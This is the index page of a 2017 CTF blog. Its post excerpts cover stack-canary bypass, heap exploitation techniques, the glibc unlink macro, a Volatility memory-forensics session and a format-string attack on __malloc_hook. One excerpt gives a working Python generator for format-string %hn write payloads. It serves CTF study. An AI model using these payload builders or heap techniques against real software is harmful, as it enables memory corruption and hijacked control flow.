Flier's Blog

F1r



Shanghai-DCTF-2017-pwn

Posted on 2017-11-30 | Category: PWN

Shanghai-DCTF-2017-pwn

Brief analysis

A quick note

The program has quite a few vulnerabilities, but the protections enabled at compile time make most of them unexploitable. During the competition I kept thinking by habit that a function protected by a canary could not be attacked through a stack overflow. Only afterwards did I notice one point, a fairly uncommon piece of knowledge, that lets the canary protection be bypassed and thus gives control over the program flow.

Read more »

Heap-Exploitation-EXP

Posted on 2017-10-27 | Category: PWN

Heap-Exploitation

Preview

  • Double Free
    • Making malloc return an already allocated fastchunk
  • Forging chunks
    • Making malloc return a nearly arbitrary pointer
  • Unlink Exploit
    • Getting (nearly) arbitrary write access
  • OFF-BY-ONE
    • Depending on the one-byte-overflow
  • House of Spirit
    • Making malloc return a nearly arbitrary pointer
  • House of Lore
    • Making malloc return a nearly arbitrary pointer
  • House of Force
    • Making malloc return a nearly arbitrary pointer
  • House of Einherjar
    • Making malloc return a nearly arbitrary pointer
Read more »

CCF2016-reverse2

Posted on 2017-10-27 | Category: REVERSE

CCF2016 Software Cracking 2

Analysis

This code section contains instructions that cannot be parsed

After the password is entered, the program starts a new child thread with the entered password as argv[1] and the original program's path as argv[0].

Read more »

Heap-Exploitation-base-knowledge-notes

Posted on 2017-10-24 | Category: PWN

Heap Exploitation

Base Knowledge

malloc_chunk

struct malloc_chunk {
    INTERNAL_SIZE_T mchunk_prev_size;  /* Size of previous chunk (if free) */
    INTERNAL_SIZE_T mchunk_size;       /* Size in bytes, including overhead */

    struct malloc_chunk* fd;           /* double links -- used only if free */
    struct malloc_chunk* bk;

    /* Only used for large blocks: pointer to next larger size */
    struct malloc_chunk* fd_nextsize;
    struct malloc_chunk* bk_nextsize;
};

typedef struct malloc_chunk* mchunkptr;
Read more »

PLAY_WITH_LINUX_HEAP-notes

Posted on 2017-10-21 | Category: PWN

PLAY WITH LINUX HEAP

Author:
memeda@0ops
pwner.xu@gamil.con

BACKGROUND

  1. The Linux heap has become hard to exploit due to the new versions of GLIBC.
    • Hundreds of thousands of assertions there.
    • ASLR and Non-eXecutable heap.
  2. Heap issues are scarce in CTF games.
    • Springing up in recent games like HOTCON CTF & Hack.LU CTF.

CATALOGUE

  1. Introduction to GLIBC Heap
  2. View Heap As an Attacker
    • free()
    • malloc()
    • main_arena
    • mmap() & munmap()
  3. Examples
Read more »

karspersky-helpme

Posted on 2017-10-19 | Category: MISC

karspersky Helpme

Routine analysis

Inspect the properties of the memory snapshot

volatility -f ./memory.vmem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/home/flier/Desktop/karspersky/helpme/memory.vmem)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x82961be8L
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0x82962c00L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2017-09-25 12:18:53 UTC+0000
Image local date and time : 2017-09-25 15:18:53 +0300
Read more »

fmt_str write func

Posted on 2017-10-16 | Category: PWN
def format(writes, idx, address_string):
    # writes: {argument offset -> 16-bit value}; the address block goes first,
    # so printf has already emitted len(address_string) bytes.
    printed = len(address_string)
    payload = ""
    # Emit the smallest value first: every later write only has to print more.
    for where, what in sorted(writes.items(), key=lambda tmp: tmp[1]):
        print(where, what)
        to_add = (what - printed) & 0xffff
        if to_add > 0:
            if to_add < 8:
                # '%0Nx' prints at least 8 hex digits for a 32-bit value, so a
                # short padding has to be literal characters instead.
                payload += (what - printed) * 'a'
            else:
                payload += '%0' + str(to_add) + 'x'
        # %hn stores the low 16 bits of the byte count at argument where+idx;
        # idx is the printf argument index at which address_string sits.
        payload += '%' + str(where + idx) + '$hn'
        printed += to_add
    return address_string + payload

writes = {}
writes[0] = (0x12345678 >> 16) & 0xffff
writes[1] = 0x12345678 & 0xffff
writes[2] = (0x12abcdef >> 16) & 0xffff
writes[3] = 0x12abcdef & 0xffff
addr_string = '\x12\x34\x56\x78' + '\x12\x34\x56\x78' + '\x12\x34\x56\x78' + '\x12\x34\x56\x78'
print(format(writes, 0, addr_string))

format string overwrite __malloc_hook

Posted on 2017-10-16 | Category: PWN

format string & reload & __malloc_hook

Even when a format string lets us write our data to any address, the ELF is linked with RELRO, so we cannot simply overwrite a GOT entry to control the instruction pointer.

We can still control the instruction pointer by writing to the address of __malloc_hook in glibc.

Read more »

unlink

Posted on 2017-10-16 | Category: PWN

HEAP UNLINK ATTACK

WHAT IS UNLINK

#define unlink(P, BK, FD) {                                                \
    FD = P->fd;                                                            \
    BK = P->bk;                                                            \
    /* Integrity check: both neighbours must point back at P.            \
       A forged fd/bk pair has to satisfy this before the writes below. */ \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                  \
      malloc_printerr (check_action, "corrupted double-linked list", P);   \
    else {                                                                 \
        /* The two writes that make unlink interesting: FD->bk and BK->fd */ \
        FD->bk = BK;                                                       \
        BK->fd = FD;                                                       \
        if (!in_smallbin_range (P->size)                                   \
            && __builtin_expect (P->fd_nextsize != NULL, 0)) {             \
            assert (P->fd_nextsize->bk_nextsize == P);                     \
            assert (P->bk_nextsize->fd_nextsize == P);                     \
            if (FD->fd_nextsize == NULL) {                                 \
                if (P->fd_nextsize == P)                                   \
                  FD->fd_nextsize = FD->bk_nextsize = FD;                  \
                else {                                                     \
                    FD->fd_nextsize = P->fd_nextsize;                      \
                    FD->bk_nextsize = P->bk_nextsize;                      \
                    P->fd_nextsize->bk_nextsize = FD;                      \
                    P->bk_nextsize->fd_nextsize = FD;                      \
                  }                                                        \
              } else {                                                     \
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;              \
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;              \
              }                                                            \
          }                                                                \
      }                                                                    \
}
Read more »

© 2017 F1r | Powered by Hexo | Theme: NexT.Pisces v5.1.3